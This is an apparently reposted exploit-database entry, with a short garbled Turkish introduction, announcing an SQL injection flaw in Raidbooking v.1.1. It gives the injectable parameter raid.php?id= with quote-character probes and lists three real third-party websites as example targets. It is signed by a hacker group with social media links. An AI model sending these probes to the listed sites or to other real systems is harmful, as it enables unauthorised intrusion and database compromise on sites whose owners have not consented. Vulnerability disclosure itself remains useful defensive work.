Raidbooking v.1.1 Sql Injection Vulnerability

Raidbooking v.1.1 Sql Injection Açığı bulunmuş oluş sql injectionun açıklarıyla neler yapılabileceğini anlatmıştım.
Açık oluşum yeri ve açık hakkındaki exploit.

[+]~P0c : 
localhost/raid.php?id=1
 
[+]~Examples:
http://mossraid.wz.cz//raid.php?id=1%27
http://wow.boule.cz/raids/raid.php?id=1%27
http://www.fredzy.fr/WOW/raid_CP/raid.php?id=1%27%22
 
(---|~DzMafia~|---)
We Are : PassWord | BackUp | Gel-dz | EliteTrojan | Lakamora | JIGsaw | Evil-Dz
 
fb.me/AlgerianMafia
fb.me/elitetrojan
 
# 01EF407405E52197   1337day.com [2013-01-27]   C1B5F30A00438C37 #

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir